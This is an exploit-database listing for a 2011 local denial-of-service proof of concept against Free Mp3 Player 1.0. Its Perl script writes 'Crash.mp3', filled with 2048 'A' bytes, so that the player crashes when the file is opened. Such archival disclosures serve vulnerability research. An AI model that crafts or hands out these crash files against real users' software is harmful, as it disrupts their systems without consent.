header-logo
Suggest Exploit
vendor:
Free Mp3 Player
by:
JaMbA
7.8
CVSS
HIGH
Denial of Service
N/A
CWE
Product Name: Free Mp3 Player
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7
2011

Free Mp3 Player 1.0 Local Denial of Service

This exploit creates a file called 'Crash.mp3' which contains a string of 'x41' characters repeated 2048 times. When the file is opened with the Free Mp3 Player 1.0, the application crashes due to the large size of the file.

Mitigation:

N/A
Source

Exploit-DB raw data:

#!/usr/bin/perl

# Exploit Title:  Free Mp3 Player 1.0 Local Denial of Service
# Date: 19-12-2011
# Author: JaMbA
# Download:
http://www.softpedia.com/get/Multimedia/Audio/Audio-Players/Free-Mp3-Player.shtml
# Version: 1.0
# Tested on: Windows 7

my $file= "Crash.mp3";
my $junk= "\x41" x 2048;
open($FILE,">$file");
print $FILE $junk;
print "\nCrash.mp3 File Created successfully\n";
print "\ Dz-Devloper Work Team (Ahmadso best friend)\n";
close($FILE);